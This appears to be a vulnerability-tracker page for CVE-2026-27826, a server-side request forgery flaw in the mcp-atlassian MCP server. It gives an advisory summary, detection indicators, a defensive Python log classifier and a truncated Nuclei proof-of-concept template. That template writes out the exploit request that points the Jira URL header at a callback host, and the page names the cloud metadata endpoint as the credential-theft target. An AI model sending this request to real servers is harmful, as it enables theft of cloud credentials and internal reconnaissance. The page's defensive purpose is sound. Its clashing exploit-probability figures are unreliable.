CVE-2026-27826
Published 2026-03-10.
Priority: P2 (68) · Severity: high · CVSS 3.1 base score: 8.2
CVSS vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
Exploit: public PoC available
EPSS: 13.59% (96.0th percentile)
MCP Atlassian is a Model Context Protocol (MCP) server for Atlassian products (Confluence and Jira). Prior to version 0.17.0, an unauthenticated attacker who can reach the mcp-atlassian HTTP endpoint can force the server process to make outbound HTTP requests to an arbitrary attacker-controlled URL by supplying two custom HTTP headers without an `Authorization` header. No authentication is required. The vulnerability exists in the HTTP middleware and dependency injection layer, not in any MCP tool handler, which makes it invisible to tool-level code analysis. In cloud deployments, this could enable theft of IAM role credentials via the instance metadata endpoint (`169[.]254[.]169[.]254`). In any HTTP deployment it enables internal network reconnaissance and injection of attacker-controlled content into LLM tool results. Version 0.17.0 fixes the issue.
Affected (3 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sooperset | mcp-atlassian | < 0.17.0 | 0.17.0 |
| sooperset | mcp-atlassian | >= 0 < 0.17.0 | 0.17.0 |
| sooperset | mcp_atlassian | < 0.17.0 | 0.17.0 |
Detection & IOCs (extracted from sources)
- path: /mcp
- header: X-Atlassian-Jira-Url
- header: X-Atlassian-Jira-Personal-Token
- header: Mcp-Session-Id
- request body (tools/call): {"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"jira_get_issue","arguments":{"issue_key":"TEST-1"}}}
- Detect SSRF exploitation attempts by monitoring for inbound HTTP requests to mcp-atlassian's /mcp endpoint that include both X-Atlassian-Jira-Url and X-Atlassian-Jira-Personal-Token headers but lack an Authorization header.
- Alert on outbound HTTP requests from the mcp-atlassian server process to 169.254.169.254 (AWS/cloud instance metadata endpoint), which indicates active SSRF exploitation for IAM credential theft.
- The vulnerability resides in the HTTP middleware/dependency injection layer, not in MCP tool handlers; tool-level logging or tracing will NOT surface this attack. Monitor at the HTTP ingress layer instead.
- Use the Nuclei PoC template logic as a detection signature: flag POST /mcp requests with Content-Type: application/json, an Mcp-Session-Id header, X-Atlassian-Jira-Url pointing to an external/unexpected host, and no Authorization header.
- The vulnerability is fixed in mcp-atlassian version 0.17.0; deployments on earlier versions are fully exposed, with no authentication bypass required.
- The attack surface only exists when mcp-atlassian is run in HTTP (server) mode; stdio/local transport modes are not affected by this network-reachable SSRF vector.
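The ingress-side signature from the bullets above, written out as an added example (not code from this page or from the mcp-atlassian project): it classifies request records by the header combination that selects the vulnerable branch and by where the supplied URL points. The EXPECTED_HOSTS allowlist, the record layout and the Confluence token header name are assumptions.

```python
import ipaddress
from urllib.parse import urlsplit

# Hosts this deployment legitimately points mcp-atlassian at (assumed value).
EXPECTED_HOSTS = {"jira.example.internal"}
HEADER_PAIRS = (  # Jira pair is from the advisory; Confluence token name assumed
    ("x-atlassian-jira-url", "x-atlassian-jira-personal-token"),
    ("x-atlassian-confluence-url", "x-atlassian-confluence-personal-token"),
)

def host_reason(url: str) -> "str | None":
    """Why the URL host is suspicious, or None if it is an expected host."""
    host = urlsplit(url).hostname
    if host is None:
        return "unparseable URL"
    if host.lower() in EXPECTED_HOSTS:
        return None
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return f"unexpected host {host}"
    if ip.is_link_local:  # 169.254.0.0/16 covers the cloud metadata endpoint
        return f"link-local address {host} (cloud metadata range)"
    return f"non-allowlisted address {host}"

def classify(req: dict) -> "tuple[str, str] | None":
    """(severity, reason) for one ingress record, or None if benign."""
    if req.get("method") != "POST" or req.get("path") != "/mcp":
        return None
    hdrs = {k.lower(): v for k, v in req.get("headers", {}).items()}
    if "authorization" in hdrs:
        return None  # Authorization present: the vulnerable branch is not taken
    for url_hdr, token_hdr in HEADER_PAIRS:
        if url_hdr in hdrs and token_hdr in hdrs:
            reason = host_reason(hdrs[url_hdr])
            if reason is None:
                return "medium", f"{url_hdr} header auth without Authorization"
            return "high", f"{url_hdr} -> {reason}"
    return None

def scan(records: list) -> list:
    """(id, severity, reason) for every record classify() flags."""
    return [(r["id"], *c) for r in records if (c := classify(r))]

# Constructed sample ingress records (not real traffic).
SAMPLE = [
    {"id": "r1", "method": "POST", "path": "/mcp", "headers": {"Authorization": "Bearer x"}},
    {"id": "r2", "method": "POST", "path": "/mcp", "headers": {"Mcp-Session-Id": "s1",
     "X-Atlassian-Jira-Url": "http://169.254.169.254", "X-Atlassian-Jira-Personal-Token": "t"}},
]
```

Feed `scan()` parsed access-log or proxy records; the "medium" class covers header auth used without Authorization against an expected host, which the bullets flag but which may be legitimate per-user configuration.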
OSV · 2026-03-10
CVE-2026-27826 [HIGH] MCP Atlassian has SSRF via unvalidated X-Atlassian-Jira-Url / X-Atlassian-Confluence-Url headers
GHSA · 2026-03-10
CVE-2026-27826 [HIGH] CWE-918 MCP Atlassian has SSRF via unvalidated X-Atlassian-Jira-Url / X-Atlassian-Confluence-Url headers
Detection rules: none found.
Nuclei · CVSS 8.2
CVE-2026-27826 [HIGH] mcp-atlassian < 0.17.0 - Server-Side Request Forgery

```yaml
mcp-atlassian 0'
      condition: and
      internal: true
  - raw:
      - |
        POST /mcp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Accept: application/json, text/event-stream
        Mcp-Session-Id: {{session_id}}
        X-Atlassian-Jira-Url: http://{{interactsh-url}}
        X-Atlassian-Jira-Personal-Token: nuclei-ssrf-test

        {"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"jira_get_issue","arguments":{"issue_key":"TEST-1"}}}
    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "http")'
          - 'status_code == 200'
        condition: and
# digest: 490a0046304402201c2d2bc1759ba10f1da4284507fc108a50bd273b2729f4ecc929de3ece8369b7022075f54aafe6f4a343fb0f2f6f10302ff801e2a28455bf97733cfa778f0dc47155:922c64590222798bb761d5b6d8e72950
```
Hackernews · blogs_hackernews · 2026-04-15 · CVSS 9.8
CVE-2026-33032 [CRITICAL]
## Actively Exploited nginx-ui Flaw (CVE-2026-33032) Enables Full Nginx Server Takeover
A recently disclosed critical security flaw impacting nginx-ui, an open-source, web-based Nginx management tool, has come under active exploitation in the wild.
The vulnerability in question is CVE-2026-33032 (CVSS score: 9.8), an authentication bypass vulnerability that enables threat actors to seize control of the Nginx service. It has been codenamed MCPwn by Pluto Security.
"The nginx-ui MCP (Model Context Protocol) integration exposes two HTTP endpoints: /mcp and /mcp_message," according to an advisory released by nginx-ui maintainers l
Wiz · blogs_wiz · CVSS 8.2
CVE-2026-27826 [HIGH] CVE-2026-27826 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27826: Python vulnerability analysis and mitigation
- Source: NVD
- Score: 8.2 (CNA score 8.2), severity HIGH
- Published: March 10, 2026
- Affected technologies: Python
- Has public exploit: Yes
- Has CISA KEV exploit: No (CISA KEV release date N/A, due date N/A)
- Exploitation probability (EPSS): 0.1, percentile 20.9
- Affected packages and libraries: mcp-atlassian (pip), severity HIGH, has fix, added Mar 11, 2026
- Sources: NVD